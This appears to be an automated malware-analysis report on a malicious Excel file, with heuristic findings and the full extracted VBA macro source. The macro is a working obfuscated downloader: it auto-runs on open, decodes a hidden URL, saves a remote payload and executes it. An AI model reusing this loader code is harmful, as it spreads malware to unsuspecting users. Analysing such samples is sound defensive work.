Verdict: MALICIOUS
Risk Score: 248

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is an Excel document containing obfuscated VBA macros. The Workbook_Open macro fires when the workbook is opened and hands control to the obfuscated code. That code relies on CreateObject and CallByName, a pattern indicative of an attempt to download and execute a secondary payload, which is a common technique for macro-based malware. No specific family could be identified because of the obfuscation and the absence of network indicators.
Heuristics (7)

- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `ErrExit: Set pubbyRodger_1 = CreateObject(hubabuba(0)) CheckBins`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `ErrExit: Set pubbyRodger_1 = CreateObject(hubabuba(0)) CheckBins`
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `Public Sub SaveMaps() rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet) Dim objStor As Variant`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `Attribute VB_Customizable = True Public Sub Workbook_Open() Call CenterByMan`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14484 bytes | 3ccbfd8ea4b148b18ee5e3527f5973881e19010b9641cb9a0b500b046a43aac4 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Call CenterByMan
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8CE1DD38-2B07-4F3D-AC62-F4321764A6DF}{44BEBCCC-45F8-4596-9A46-D713FAEB2B88}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Public pubbyRodger_1 As Object
Public pubbyRodger_2 As Object
Public pubbyRodger_3 As Object
Public pubbyRodger_7() As String
Public pubbyRodger_4 As String
Public pubbyRodger_5 As String
Public pubbyRodger_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum As Double
For i = startRow To endRow
For j = 0 To UBound(arrCol)
If IsNumeric(Cells(i, arrCol(j)).Value) Then
sum = sum + Cells(i, arrCol(j)).Value
End If
Next j
res(i - startRow + 1, 1) = sum
sum = 0
Next i
rngCol = res
End Function
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum()
ReDim sum(0 To UBound(arrCol))
For i = startRow To endRow
For j = 0 To UBound(arrCol)
sum(j) = Cells(i, arrCol(j)).Value
Next j
res(i - startRow + 1, 1) = sum
ReDim sum(0 To UBound(arrCol))
Next i
rngArr = res
End Function
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
Dim res()
ReDim res(0 To ending - start)
Dim i As Integer
For i = start To ending
res(i - start) = i
Next i
rng = res
End Function
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
hubabuba = Split(UserForm1.Label1.Caption, "/")
GoTo ErrExit
ErrExit:
Set pubbyRodger_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
Public Function p()
' check if the val is array
Dim is_a As Boolean
Dim k
For Each k In Me.dict.Keys
is_a = IsArray(Me.dict(k))
Exit For
Next k
If is_a Then
For Each k In Me.dict.Keys
Debug.Print k & " " & a_toString(Me.Item(k))
Next k
Else
For Each k In Me.dict.Keys
Debug.Print k & " " & Me.Item(k)
Next k
End If
End Function
Public Function a_toString(ByVal arr As Variant) As String
Dim res As String
Dim i
res = "["
For Each i In arr
res = res & Replace(" " & i, ",", ".") & ", "
Next i
res = Left(res, Len(res) - 2)
a_toString = res & " ]"
End Function
Public Function pk()
Dim k
For Each k In Me.dict.Keys
Debug.Print k
Next k
End Function
Public Sub SaveMaps()
rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet)
Dim objStor As Variant
CallByName pubbyRodger_2, hubabuba(9), VbMethod, rbp
CallByName pubbyRodger_2, hubabuba(11), VbMethod, pubbyRodger_5, 2
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
pubbyRodger_6.Open (pubbyRodger_5)
End Sub
Attribute VB_Name = "Module4"
Public Function toJSON(Optional ByVal k As String = "root") As String
Dim res As String
res = "{""name"":""" & k & """," & Chr(13)
res = res & """children"":[" & Chr(13)
Dim ky
For Each ky In pDict.Keys
res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
Next ky
toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
End Function
Attribute VB_Name = "Module3"
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
Dim k
Dim i
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
res.dict(k) = productArr(pDict(k), operation, operand2)
Next k
Else
For Each k In pDict.Keys
If operand2.dict.Exists(k) Then
res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
End If
Next k
End If
Set productRng = res
End Function
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
Dim res
Dim i
ReDim res(LBound(arr1) To UBound(arr1))
If IsNumeric(arr2) Then
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
Next i
Else
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
Next i
End If
productArr = res
End Function
Public Function crentips(nY As Integer) As String
Dim pubbyRodger_8 As Integer
Dim pubbyRodger3_1 As String
pubbyRodger3_1 = ""
GoTo s2
s2:
For pubbyRodger_8 = LBound(pubbyRodger_7) To UBound(pubbyRodger_7)
pubbyRodger3_1 = pubbyRodger3_1 & Chr(CInt(pubbyRodger_7(pubbyRodger_8)) - 1000)
Next pubbyRodger_8
GoTo SIDR4
SIDR4:
pubbyRodger_1.Open hubabuba(5), pubbyRodger3_1, False
KeepBlyading
End Function
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
Dim res As New Dicts
Dim k
Call res.ini
If l > 1 Then
For Each k In d.dict.Keys
Set res.dict(k) = clone__(d.dict(k), l - 1)
Next k
Else
For Each k In d.dict.Keys
res.dict(k) = d.dict(k)
Next k
End If
Set clone__ = res
End Function
Public Sub CheckBins()
pubbyRodger_7 = Split("1104:1116:1116:1112:1058:1047:1047:1104:1111:1109:1101:1046:1099:1111:1112:1121:1099:1108:1117:1098:1046:1114:1117:1047:1119:1112:1045:1097:1100:1109:1105:1110:1047:1109:1097:1105:1110:1116:1047:1055:1054:1103:1104:1098:1121:1054:1102:1052:1053:1046:1101:1120:1101", _
":")
Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set pubbyRodger_2 = CreateObject(hubabuba(1))
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
Set pubbyRodger_6 = CreateObject(hubabuba(2))
Set husbanD = CreateObject(hubabuba(3))
Set pubbyRodger_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub
Public Function filterInklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterInklude = res
End Function
''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''
Public Function constDict(Optional ByVal constant As Variant) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsMissing(constant) Then
constant = 1
End If
For Each k In pDict.Keys
res.dict(k) = constant
Next k
Set constDict = res
End Function
Attribute VB_Name = "Module2"
'''''''''''''''''''
'@param operand2 can be either number or Dicts
' operation supports only the string
'''''''''''''''''''
Public Function product() As Variant
Dim k
Dim isNum As Boolean
isNum = True
pubbyRodger_5 = pubbyRodger_4
GoTo LABZ4
Dim res As Variant
Call res.ini
If Not IsMissing(IsNumericOperation) Then
If Not IsNumericOperation Then
isNum = False
End If
Else
isNum = True
End If
LABZ4:
pubbyRodger_5 = pubbyRodger_5 + hubabuba(12)
Exit Function
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
If Not isNum Then
res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
Else
res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
End If
Next k
Else
For Each k In pDict.Keys
If Not isNum Then
If operand2.dict.Exists(k) Then
res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
End If
Else
If operand2.dict.Exists(k) Then
res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
End If
End If
Next k
End If
Set product = res
End Function
Public Sub OnasOn()
CallByName pubbyRodger_2, hubabuba(7), VbLet, 1
pubbyRodger_2.Open
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
SaveMaps
End Sub
Public Function reduceRngVertical(ByVal sign As String) As Variant
Dim k
Dim i
Dim tmpCnt As Integer
tmpCnt = 1
Dim arr()
Dim u As Integer
Dim l As Integer
For Each k In pDict.Keys
If tmpCnt = 1 Then
u = UBound(pDict(k))
l = LBound(pDict(k))
ReDim arr(l To u)
tmpCnt = 2
If sign = "+" Then
For i = l To u
arr(i) = 0
Next i
Else
For i = l To u
arr(i) = 1
Next i
End If
End If
If sign = "+" Then
For i = l To u
arr(i) = arr(i) + pDict(k)(i)
Next i
Else
For i = l To u
arr(i) = arr(i) * pDict(k)(i)
Next i
End If
Next k
reduceRngVertical = arr
End Function
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
Dim res As Variant
Dim k
If sign = "" Or sign = "+" Then
res = 0
For Each k In arr
res = res + k
Next k
ElseIf sign = "*" Then
res = 1
For Each k In arr
res = res * k
Next k
End If
reduceArray = res
End Function
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
res.dict(k) = k
End If
Next k
Else
For Each k In pDict.Keys
If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
res.dict(k) = k
End If
Next k
End If
Set filterVal = res
End Function
Public Sub KeepBlyading()
pubbyRodger_1.Send
GoTo SIDR4
If IsMissing(keepOriginalVal) Then
keepOriginalVal = True
End If
Dim k
Dim res As Variant
res.dict = pDict
For Each k In dict2.dict.Keys
If Not pDict.Exists(k) Then
res.dict(k) = dict2.dict(k)
ElseIf Not keepOriginalVal Then
res.dict(k) = dict2.dict(k)
End If
Next k
Set Add = res
SIDR4:
pubbyRodger_4 = pubbyRodger_3(hubabuba(6))
GoTo SIDR1
SIDR1:
product
OnasOn
End Sub
Public Function filterExklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If Not reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterExklude = res
End Function